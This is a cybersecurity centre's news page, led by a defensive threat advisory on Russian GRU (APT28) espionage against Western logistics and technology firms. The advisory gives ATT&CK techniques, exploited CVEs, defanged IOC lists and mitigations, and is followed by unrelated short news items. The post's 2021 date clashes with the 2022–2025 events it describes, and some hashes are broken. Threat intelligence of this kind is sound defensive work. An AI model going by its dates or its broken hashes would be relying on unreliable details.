News

September 9, 2021

Russian GRU Targeting Western Logistics Entities and Technology Companies

I. Targeted Entities

  • Western logistics entities and technology companies involved in transportation and coordination of aid to Ukraine.
  • Defense industry entities
  • Transportation hubs (ports, airports)
  • Maritime sectors
  • Air traffic management systems
  • IT services

II. Introduction

Since early 2022, the Russian General Staff Main Intelligence Directorate (GRU), specifically its 85th Main Special Service Center (85th GTsSS), also identified as APT28, Fancy Bear, Forest Blizzard, and BlueDelta, has been actively conducting cyber espionage operations against Western logistics and technology entities. This ongoing campaign primarily targets entities facilitating foreign assistance to Ukraine, highlighting a strategic effort to monitor, disrupt, or influence the flow of aid to Ukraine.

Attack Details: The GRU unit 26165 has leveraged sophisticated cyber espionage tactics, including credential guessing, spearphishing, exploitation of known vulnerabilities, and abuse of internet-facing infrastructure such as corporate VPNs. Notable vulnerabilities exploited in this campaign include CVE-2023-23397 (Outlook NTLM), CVE-2023-38831 (WinRAR), and several Roundcube vulnerabilities (CVE-2020-12641, CVE-2020-35730, CVE-2021-44026).

Recent analysis highlights the GRU’s use of geopolitical event lures, notably exploiting the Israel-Hamas conflict to deliver the HEADLACE malware, enabling comprehensive network penetration and persistent espionage (Mühr, Zaboeva, & Fasulo, 2025).

III. MITRE ATT&CK Framework

Initial Access:

  • Exploitation of Public-Facing Applications (T1190)
    • Exploited known vulnerabilities in publicly accessible applications such as Microsoft Exchange and corporate VPNs to achieve initial entry.
  • Spearphishing (T1566)
    • Distributed carefully crafted phishing emails using contextually relevant geopolitical lures (e.g., Israel-Hamas conflict) to trick users into executing malicious payloads.
  • Brute Force and Credential Guessing (T1110)
    • Conducted systematic credential guessing and brute force attacks targeting exposed remote services, including RDP and VPN logins.

Execution:

  • Command and Scripting Interpreter (T1059)
    • Command and Scripting Interpreter (T1059) is a highly prevalent execution technique in MITRE ATT&CK that adversaries use to run arbitrary commands, scripts, or binaries on target systems via built in interpreters like PowerShell, cmd.exe, Bash, Python, JavaScript, AppleScript, Visual Basic and more.
  • User Execution (T1204)
    • Deployed malicious attachments and phishing links designed to prompt users into inadvertently executing malicious scripts or payloads.

Persistence:

  • Scheduled Task (T1053)
    • Established scheduled tasks to regularly execute malicious scripts and maintain long-term access.
  • • Shortcut Modification (T1547.009)
  • o Altered desktop shortcuts to point to malicious executables, ensuring persistent and subtle execution during regular user operations.

Privilege Escalation:

  • Abuse of Elevation Control Mechanisms (T1548)
    • Exploited software vulnerabilities, notably CVE-2023-23397, enabling unauthorized elevation of privileges to access sensitive resources.

Credential Access:

  • Credential Dumping (T1003)
    • Harvested credentials through techniques such as memory scraping, registry dumps, and exploitation of NTLM hashes.
  • Exploitation of NTLM Vulnerability (CVE-2023-23397)
    • CVE 2023 23397 is a critical “zero touch” elevation of privilege vulnerability in Microsoft Outlook for Windows that allows attackers to exfiltrate a user’s Net NTLMv2 hash without any user interaction.

Lateral Movement:

  • Remote Desktop Protocol (T1021.001)
    • Employed Remote Desktop Protocol to navigate laterally through compromised networks, enhancing the attacker’s reach and access.
  • Use of tools such as Impacket and PsExec
    • Impacket is a Python-based collection of modules that allows attackers to craft and send network protocol packets, making it particularly useful for exploiting protocols like SMB, RDP, and Kerberos. It’s frequently used to perform pass-the-hash, NTLM relay, and DCSync attacks.
  • PsExec, part of Microsoft Sysinternals, enables remote execution of processes and is commonly used by adversaries to run commands or deploy payloads across a network without needing remote desktop access.

Discovery:

  • Active Directory Enumeration (T1087)
    • Mapped organizational structures by enumerating Active Directory objects to identify high-value targets.
  • Network Service Scanning (T1046)
    • Conducted extensive internal scans post-compromise to locate vulnerable or exploitable network services.

Command and Control:

  • Application Layer Protocol (T1071)
    • Used standard protocols such as HTTP(S) and DNS to blend malicious traffic with legitimate communications, complicating detection efforts.
  • Legitimate Web Services (T1102)
    • Leveraged trusted cloud and hosting services to host command and control infrastructure, reducing suspicion and bypassing traditional network defenses.

Exfiltration:

  • Data Exfiltration via Command and Control Channel (T1041)

Phase Technique Description
Data Prep T1560.001 ZIP compression via PowerShell
Exfiltration Channel T1041 Upload via C2 (SSH or API)
Tools Impacket, PsExec, Certipy, ADExplorer, SSH
Timing Strategy Periodic bursts, geo-proximity, stealth scheduling
  • Archive Collected Data (T1560)
    • Compressed and encrypted sensitive data into ZIP files using PowerShell scripts for exfiltration.

IV. Indicators of Compromise (IOCs)

  • IP Addresses observed in brute force activities:
  • 103[.]97[.]203[.]29
  • 109[.]95[.]151[.]207
  • 138[.]199[.]59[.]43
  • 147[.]135[.]209[.]245
  • 162[.]210[.]194[.]2
  • 178[.]235[.]191[.]182
  • 178[.]37[.]97[.]243
  • 185[.]234[.]235[.]69
  • 192[.]162[.]174[.]67
  • 192[.]162[.]174[.]94
  • 194[.]187[.]180[.]20
  • 207[.]244[.]71[.]84
  • 209[.]14[.]71[.]127
  • 212[.]127[.]78[.]170
  • 213[.]134[.]184[.]167
  • 31[.]135[.]199[.]145
  • 31[.]42[.]4[.]138
  • 46[.]112[.]70[.]252
  • 46[.]248[.]185[.]236
  • 64[.]176[.]67[.]117
  • 64[.]176[.]69[.]196
  • 64[.]176[.]70[.]18
  • 64[.]176[.]70[.]238
  • 64[.]176[.]71[.]201
  • 70[.]34[.]242[.]220
  • 70[.]34[.]243[.]226
  • 70[.]34[.]244[.]100
  • 70[.]34[.]245[.]215
  • 70[.]34[.]252[.]168
  • 70[.]34[.]252[.]186
  • 70[.]34[.]252[.]222
  • 70[.]34[.]253[.]13
  • 70[.]34[.]253[.]247
  • 70[.]34[.]254[.]245
  • 79[.]184[.]25[.]198
  • 79[.]185[.]5[.]142
  • 83[.]10[.]46[.]174
  • 83[.]168[.]66[.]145
  • 83[.]168[.]78[.]27
  • 83[.]168[.]78[.]31
  • 83[.]168[.]78[.]55
  • 83[.]23[.]130[.]49
  • 83[.]29[.]138[.]115
  • 89[.]64[.]70[.]69
  • 90[.]156[.]4[.]204
  • 91[.]149[.]202[.]215
  • 91[.]149[.]203[.]73
  • 91[.]149[.]219[.]158
  • 91[.]149[.]219[.]23
  • 91[.]149[.]223[.]130
  • 91[.]149[.]253[.]118
  • 91[.]149[.]253[.]198
  • 91[.]149[.]253[.]204
  • 91[.]149[.]253[.]20
  • 91[.]149[.]254[.]75
  • 91[.]149[.]255[.]122
  • 91[.]149[.]255[.]19
  • 91[.]149[.]255[.]195
  • 91[.]221[.]88[.]76
  • 93[.]105[.]185[.]139
  • 95[.]215[.]76[.]209
  • Outlook CVE Exploitation IOCs
    • md-shoeb@alfathdoor[.]com[.]sa
    • jayam@wizzsolutions[.]com
    • accounts@regencyservice[.]in
    • m.salim@tsc-me[.]com
    • vikram.anand@4ginfosource[.]com
    • mdelafuente@ukwwfze[.]com
    • sarah@cosmicgold469[.]co[.]za
    • franch1.lanka@bplanka[.]com
    • commerical@vanadrink[.]com
    • maint@goldenloaduae[.]com
    • karina@bhpcapital[.]com
    • tv@coastalareabank[.]com
    • ashoke.kumar@hbclife[.]in
    • 213[.]32[.]252[.]221
    • 124[.]168[.]91[.]178
    • 194[.]126[.]178[.]8
    • 159[.]196[.]128[.]120
  • Commonly Used Webmail Providers:
    • portugalmail[.]pt
    • mail-online[.]dk
    • email[.]cz
    • seznam[.]cz
  • Malicious Archive filenames
    • calc.war.zip
      • Hash: 763d47f16a230f7c2d8c135b30535a52d66a1ed 210596333ca1c3890d72e6efc
    • Zeyilname.zip
      • Hash: 22ed5c5cd9c6a351398f1e56efdfb16d52cd33cb4b2062
        37487a03443d3de893
      • Hash: 45e44afeb8b890004fd1cb535978d0754ceaa7129082c
        b72386a80a5532700d1
    • news_week_6.zip
      • Hash: 16bcd167162e4ded71b8c7e9a2587be821d3a752c71fc
        bb2ae64cf1088b62fc0
      • Hash: 5b8c240083cba4442fb6bbb092efd430ce998530cc10f
        d181b3f71845ec190ce
      • Hash: 84638698fdcf2e9e45e7dd560c8d00fb4da6fa32dabaac
        d31b3538d38755dad4
      • Hash: f983d786f4dc2d1793f6b28907c4035c96b6b5c8765ba1
        2dc4510dab0fceabf5
    • war.zip
      • Hash: d37779e16a92da7bd05eae50c64b36e2e2022eb4413
        82be686fda4dbd1800e90
      • Hash: 2ac6735e8e0b23b222161690adf172aec668894d17029
        9e9ff2c54a4ec25b1f4
      • Hash: 8cc664ff412fc80485d0af61fb0617f818d37776e5a06b7
        99f74fe0179b31768
      • Hash: ec64b05307ad52f44fc0bfed6e1ae9a2dc2d093a42a8347f069f3955ce5aaa89
    • SEDE-PV-2023-10-09-1_EN.zip
      • Hash: 8dba6356fdb0e89db9b4dad10fdf3ba37e92ae42d55e7bb8f76b3d10cd7a780c
    • Roadmap.zip
  • Malicious scripts/tools observed:
    • HEADLACE (backdoor)
      • A backdoor used to establish persistent access, execute commands remotely, and maintain stealth communication channels with the attackers.
    • MASEPIE (malware)
      • Custom malware designed for executing remote commands, data theft, and maintaining a persistent foothold within compromised networks.
    • STEELHOOK (credential theft)
      • Specialized malware created to extract and exfiltrate sensitive user credentials, aiding further lateral movement and deeper infiltration.

V. Recommendations

  • Patch Known Vulnerabilities:
    • Regularly update all software and firmware.
    • Conduct continuous vulnerability assessments to identify and mitigate security gaps.
  • Enhance Detection and Monitoring:
    • Deploy endpoint detection and response (EDR) systems.
    • Utilize behavioral analysis tools to detect anomalous activities.
  • Strengthen Authentication Practices:
    • Implement multi-factor authentication (MFA).
    • Regularly audit user permissions and account activities.
  • Network Security:
    • Employ network segmentation.
    • Block unauthorized VPN and proxy services.
  • User Awareness:
    • Conduct regular security training focusing on recognizing phishing and social engineering tactics.
  • Incident Response Preparation:
    • Establish and routinely test incident response protocols to quickly contain and remediate intrusions.

VI. Conclusion

Given the strategic nature of this campaign targeting critical logistical infrastructure, Western logistics and technology entities must maintain heightened vigilance. Employing comprehensive security measures and regular training will be crucial in mitigating the ongoing threat posed by the GRU’s advanced cyber espionage operations.

VII. References

Command and scripting interpreter. Command and Scripting Interpreter, Technique T1059 – Enterprise | MITRE ATT&CK®. (n.d.). https://attack.mitre.org/techniques/T1059/

Exfiltration over C2 channel. Exfiltration Over C2 Channel, Technique T1041 – Enterprise | MITRE ATT&CK®. (n.d.). https://attack.mitre.org/techniques/T1041/

Insikt Group. (2025, April 30). France Ties Russian APT28 to Attacks Targeting French Infrastructure and Institutions. Recorded Future. https://app.recordedfuture.com/portal/research/insikt/doc:5pGMcT?organization=uhash%3A5SiRB4MNDF

Insikt Group. (2024, May 30). GRU’s BlueDelta Targets Key Networks in Europe with Multi-Phase Espionage Campaigns. Recorded Future. https://go.recordedfuture.com/hubfs/reports/CTA-RU-2024-0530.pdf

Lesnewich, G., & Giering, C. (2023, December 5). TA422’s dedicated exploitation loop-the same week after week. Proofpoint. https://www.proofpoint.com/us/blog/threat-insight/ta422s-dedicated-exploitation-loop-same-week-after-week

Martin, A. (2025, May 21). Western intelligence agencies unite to expose Russian hacking campaign against logistics and Tech firms. Cyber Security News | The Record. https://therecord.media/western-intelligence-alert-russia-hackers-logistics-fancy-bear-apt28

Microsoft Incident Response. (2025, June 18). Guidance for investigating attacks using CVE-2023-23397. Microsoft Security Blog. https://www.microsoft.com/en-us/security/blog/2023/03/24/guidance-for-investigating-attacks-using-cve-2023-23397

Mühr, G., Zaboeva, C., & Fasulo, J. (2025, April 17). ITG05 operations leverage Israel-hamas conflict lures to deliver Headlace malware. IBM. https://www.ibm.com/think/x-force/itg05-ops-leverage-israel-hamas-conflict-lures-to-deliver-headlace-malware

Ribeiro, A. (2025, May 25). Russian GRU’s unit 26165 conducts two-year cyber espionage on logistics, Tech firms using IP cameras, supply chains. Industrial Cyber. https://industrialcyber.co/cisa/russian-grus-unit-26165-conducts-two-year-cyber-espionage-on-logistics-tech-firms-using-ip-cameras-supply-chains/

Russian GRU Targeting Western Logistics Entities and Technology Companies. U.S. Department of Defense. (2025, May). https://media.defense.gov/2025/May/21/2003719846/-1/-1/0/CSA_RUSSIAN_GRU_TARGET_LOGISTICS.PDF

Russian GRU targeting western logistics entities and technology companies: CISA. Cybersecurity and Infrastructure Security Agency CISA. (2025, May 21). https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-141a

Threat Advisory created by The Cyber Florida Security Operations Center. Contributing Security Analyst(s): Kevin Wong, Jason Doan

Russian GRU Targeting Western Logistics Entities and Technology Companies2025-06-27T09:30:56-04:00

Protecting Against Elder Fraud and Scams: A Cybersecurity Guide

This resource offers practical steps to help protect older adults and those who support them against cyber elder fraud. Older adults are increasingly targeted by cybercriminals who exploit trust, unfamiliarity with technology, and financial vulnerability. From phishing scams to tech support fraud and identity theft, these attacks often result in significant emotional and financial harm.

Read through for information on common elder scams, best practices for keeping personal information protected, and where and how to report a cyber elder fraud.

Guide created by the Cyber Florida Security Operations Center. Contributing Security Analysts: Lara Radovanovic, Zahid Rahman, Waratchaya Luangphairin

Protecting Against Elder Fraud and Scams: A Cybersecurity Guide2025-06-30T12:19:09-04:00

CIP Flash Bulletin | Heightened Iranian Cyber Threat Activity

This special Critical Infrastructure Protection Flash Bulletin outlines increased cyber threat activity linked to Iran amid rising regional tensions. It highlights Iran’s history of targeting U.S. infrastructure, current threat actors and tactics, key vulnerabilities, and priority mitigation strategies. Critical infrastructure sectors are advised to stay vigilant and implement immediate protections. The bulletin also includes federal resources and recommendations to strengthen preparedness.

CIP Flash Bulletin | Heightened Iranian Cyber Threat Activity2025-06-23T14:22:51-04:00

Student Spotlight: Kailyn Roach

Kailyn Roach

Student: Kailyn Roach

School: Jupiter High School

District: Palm Beach County

Meet Kailyn Roach, a standout cybersecurity student at Jupiter High School in Palm Beach County, Florida. Kailyn has recently accepted a position as a programming intern with Neuro Building Systems.

Over the past three years, she has actively participated in the CSHS cybersecurity program and consistently competed in academic competitions, excelling in science and technology courses. With an impressive 4.96 GPA, Kailyn also shines outside the classroom as a competitive soccer player—earning the President’s Cup three years in a row—and holds multiple certifications in Java, JavaScript, and various engineering disciplines.

Beyond academics and athletics, Kailyn enjoys surfing, skiing, and practicing martial arts. Passionate about entering the field of cybersecurity, she hopes to contribute to advancements in ophthalmology by bridging the gap between medical professionals and the technology that supports them.

Do you teach a great student who should be featured in our Student Spotlight?
Please complete the form below!

Student Spotlight: Kailyn Roach2025-06-17T15:54:41-04:00

Teacher Spotlight: Christopher Aaron

Christopher Aaron

Teacher: Christopher Aaron

County: Nassau

Chris Aaron is a standout teacher in Nassau County. This year marks a double milestone: it’s Chris’s first year as an educator and the district’s inaugural year offering cybersecurity and network security courses. He holds a bachelor’s degree in cybersecurity management and is currently pursuing a master’s degree in the same field.

Chris says, “Cyber education plays a vital role in equipping individuals to navigate the digital landscape securely and responsibly, empowering them to protect themselves and their data from evolving threats.”

Chris shares that one of the most rewarding aspects of teaching cybersecurity is seeing students grow in their confidence in staying safe online. Supporting this development is especially fulfilling in a constantly evolving field and full of opportunities for continued learning and advancement.

We are so grateful for Chris’s dedication to cybersecurity education and his commitment to students across Florida.

Would you like to be featured in our Teacher Spotlight? To nominate yourself or another deserving teacher, complete the interest form below!

Teacher Spotlight: Christopher Aaron2025-06-12T09:04:59-04:00

No Password Required Podcast Episode 60 — Reginald “Andre” Andre

No Password Required Podcast Episode 60 — Reginald Andre

Reginald “Andre” Andre — CEO of ARK Solvers and Builder of Human + AI-Driven Culture

Our guest Reginald “Andre” Andre is the dynamic founder and CEO of ARK Solvers. A chance encounter at a CompUSA store sparked a series of events which eventually created ARK Solvers—now one of South Florida’s fastest-growing IT and cybersecurity companies, serving small and mid-size companies with a sharp focus on compliance and innovation.

With nearly two decades of experience, Andre shares how his company has evolved from general IT support to cybersecurity and now into the realm of AI. He reveals how creating a growth-centered environment for his team—and hiring for attitude over skill—has been crucial to ARK’s culture and success. He also reflects on how his frustration with the lack of computer classes at his son’s school led to the launch of a computer club that brought them closer together.

In the Lifestyle Polygraph segment, Andre unpacks his AI-powered board of directors—which includes Steve Jobs and Grant Cardone—and what he’d do if tasked with launching a nationwide mentorship initiative. Plus, he urges students to get aggressive with internships: “Ask early and often.” Join hosts Jack Clabby of Carlton Fields, P.A., and resident cybersecurity expert Kayley Melton, founder of Reality Shift, for this exciting podcast.

Follow Andre on LinkedIn: https://www.linkedin.com/in/reginald-andre-122ba552/

No Password Required Podcast Episode 60 — Reginald “Andre” Andre2025-06-09T08:14:34-04:00

Virtual Cyber Workshop for Critical Infrastructure, Aug 27, 2025

Virtual Cybersecurity Workshop for Critical Infrastructure

August 27, 2025 | 8:30am – 12 Noon

Cyber Florida’s Critical Infrastructure Protection (CIP) Workshop brings together public-sector leaders, IT professionals, and emergency managers to tackle real-world cyber threats facing Florida’s essential services. These hands-on sessions deliver practical tools, expert insights, and interactive scenarios designed to help SLTT agencies strengthen their cyber resilience and readiness.

  • Receive actionable recommendations for enhancing compliance with Florida Statute 282.318
  • See an overview of Cyber Florida’s no-cost solutions and services to strengthen your organization’s cyber defenses.
  • Engage in an exciting tabletop exercise hosted by the National Cybersecurity Preparedness Consortium (NUARI), offering hands-on experience in responding to cyber incidents.

Whether you’re securing water systems, transportation networks, or municipal services, these workshops are your front line in building a safer Florida. Don’t miss this chance to improve your cybersecurity posture and resilience!

Virtual Cyber Workshop for Critical Infrastructure, Aug 27, 20252025-09-05T12:57:52-04:00

NIST Report Progress

Photo of Dr. Sriram Chellapan

Sustainable, Hands-on and Multi-disciplinary Cybersecurity Skills Training to Meet Workforce Needs of Critical Infrastructure Sectors in Florida

A Report of Project Progress by Cyber Florida at USF

In Spring 2024, Cyber Florida was awarded a two-year, $200,000 grant from National Institute of Standards and Technology for their project – “Sustainable, Hands-on and Multi-disciplinary Cybersecurity Skills Training to Meet Workforce Needs of Critical Infrastructure Sectors in Florida” as part of their Regional Alliances and Multistakeholder Partnerships to Stimulate (RAMPS) Cybersecurity Education and Workforce Development (RAMPS Program).

The overall goals of the project are a) solicit core cybersecurity workforce needs both within and across various critical infrastructure (CI) sectors in Florida; b) analyze and summarize findings across entry level workforce needs; c) design a semester-level and practical/ hands-on cybersecurity training program for students that is to meet entry-level CI workforce needs; d) connect the first cohort of trained students to critical infrastructure sectors via interns and full-time positions; e) evaluate outcomes across multiple metrics including student self-assessment, industry expert assessment, program sustainability and scalability across institutions and CI sectors in FL.

Based on survey responses, we identified tangible gaps in entry level workforce needs across CI sectors in Florida in a broad sense, and started designing a 14 weeks hands on training program for students. The program was also designed keeping in mind the components of the Workforce Framework for Cybersecurity (NICE Framework) published on March 5, 2024 by NIST. The framework is publicly available at and contains Task, Knowledge, and Skill (TKS) Statements; Work Role Categories and Work Roles; and Competency Areas in the realm of cybersecurity workforce. The framework is available at https://www.nist.gov/itl/applied-cybersecurity/nice/nice-framework-resource-center.

We recruited our first cohort of five students for this semester-level program from the newly formed Bellini College of AI, Cybersecurity and Computing (CAICC) at the University of South Florida in January 2025. The five students went through our 14 week program centered on three foundational pillars – a) Basic Security Blue Team Level 1 (BTL1) Training for one month; b) Industrial Control Systems Foundational Course via the Aligned Realistic Cyberattack Simulation (ARCS) platform offered by SimSpace for one month; and c) ICS/SCADA Security Essentials course offered by the SANS institute. Students are eligible for a BTL1 certificate, and a Global Industrial Cyber Security Professional Certification (GICSP) in Industrial Control Systems upon completing a) and c). In addition, throughout the program, students are exposed to backdoors and breaches exercises, participate in mock security operations center (SOC) intelligence briefs, and also read state of the art research papers and trends in cyber centered critical infrastructure protection.

Multiple critical infrastructure entities in Florida participated in student engagement activities in Spring 2025. These include Tampa Airport, Tampa General Hospital, Talquin Coop and Seminole Electric. We have our next cohort of students starting in Fall 2025, and you are welcome to engage with Cyber Florida/ our students in the program. Post training, we expect our students to meet internship and entry-level workforce requirements in cybersecurity for critical infrastructure sectors in Florida.

NIST Report Progress2025-06-04T13:01:30-04:00

CIPP Update: June 2025

CI Mapping

Cyber Florida has employed geospatial analytics and cybersecurity assessments to improve visibility into Florida’s vital infrastructure, enabling more effective coordination, risk mitigation, and rapid response efforts across state agencies.

Leveraging advanced technology to identify critical infrastructures significantly improves state leadership’s situational awareness and decision-making in all-hazards planning and preparedness.

Critical Infrastructure Protection Program Timeline

CIPP Update: June 20252025-06-04T12:43:42-04:00

CONTACT US

Cyber Florida at USF
4202 E. Fowler Avenue, ISA7020
Tampa, FL 33620

Office meetings by appointment only

PRIVACY POLICY

Copyright 2026 The Florida Center for Cybersecurity at the University of South Florida. Information on this website is made available for general educational purposes only and should not be used in lieu of obtaining competent legal advice from a licensed attorney or cybersecurity professional with sufficient expertise necessary to address your specific needs. Use of this website does not create any special or fiduciary relationship between you and the Florida Center for Cybersecurity or the University of South Florida.